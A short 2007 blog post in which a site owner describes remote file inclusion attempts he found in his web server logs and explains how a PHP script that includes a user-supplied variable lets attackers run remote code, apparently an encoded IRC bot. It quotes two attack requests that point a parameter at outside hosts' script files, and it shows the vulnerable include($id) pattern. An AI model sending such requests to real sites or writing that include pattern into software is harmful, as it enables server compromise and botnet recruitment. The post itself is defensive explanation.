I happened to be watching a log file when I was testing something and happened to notice the following type of request go by:

217.11.225.208 - - [05/Oct/2007:12:46:32 -0400] "GET /pictures/index.php?id=830/index.php?id=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 200 1435 "-" "libwww-perl/5.805"

85.11.62.235 - - [06/Oct/2007:01:03:47 -0400] "GET /pictures/index.php?id=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 200 1455 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"

Which was interesting, as it's obviously some type of hack attempt. I decided to look into it and it seems that it's a scripted attempt to just pass the url to any scripts that accept a variable, in hopes that someone was silly enough to accept that variable as an include and happened to have remote includes turned on in there php config, something like this:

< ?php

include($id);

// rest of script

?>

Then when the page is called, the url is passed in as the include and the script gets executed. Which seems to be some type of irc bot, although the file is all encoded to help try and hide what exactly is going on, although I'm sure you end up in some bot net ultimately. And from what I read it's not uncommon for people to actually have a page setup like that for redirects or some such nonsense. Obviously not a good practice as you'd likely end up victim to this request.

Here are a copy of the scripts hosted locally from the above to examples, as I doubt they'll be around forever on those hosts. cs.txt & cmd.txt

posted at: 02:45 | path: /security | permanent link to this entry